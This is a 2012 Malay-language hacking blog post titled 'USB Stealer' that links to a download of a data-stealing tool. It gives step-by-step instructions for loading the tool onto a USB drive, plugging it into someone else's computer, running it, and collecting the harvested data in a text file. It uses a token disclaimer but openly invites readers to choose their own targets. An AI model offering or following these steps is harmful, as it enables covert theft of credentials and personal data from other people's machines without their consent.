scrolling text

Selamat datang ke blog HackingSoftware41. Selamat membaca. Jangan lupa lawati www.jomgegar.com jumpa anda disana

ads

loading...

Monday, December 31, 2012

USB Stealer

JANGAN DISALAHGUNAKAN, KAMI TIDAK AKAN BERTANGGUNGJAWAB DIATAS SESUATU YANG BERLAKU, SEKADAR UNTUK BERKONGSI SAHAJA




Morning kawan-kawan, ok hari ini aku nak post satu benda baru tapi dah lama. Tajuk post aku hari ini ialah "USB STEALER". Aku ada try benda ni 2 tahun lepas, and terbukti berjaya. Aku test kat laptop aku sendiri je, hahahha jangan salah faham. Untuk korang terpulang lah mau test pada sapa.



Download USB STEALER : >>>> http://adf.ly/X9Gcm <<<<





  • Mula-mula korang download software stealer dulu kat link atas ni
  • Lepas tu korang extract software ke dalam usb stealer korang
  • USB yang korang dah masukkan software stealer tadi tu korang plug in dalam laptop atau pc sesape yang korang nak (mencuri adalah salah! Hanya tutorial sahaja)
  • Korang open folder stealer tadi tu, korang "RUN" seperti gambar kat bawah ni






  • Korang nampak kan?
  • korang run file yang dalam kotak tu.
  • Korang lihat lah hasilnya dalam folder .txt dalam usb korang tu...
  • Selamat mencuba
  • Enjoy!!!

3 comments: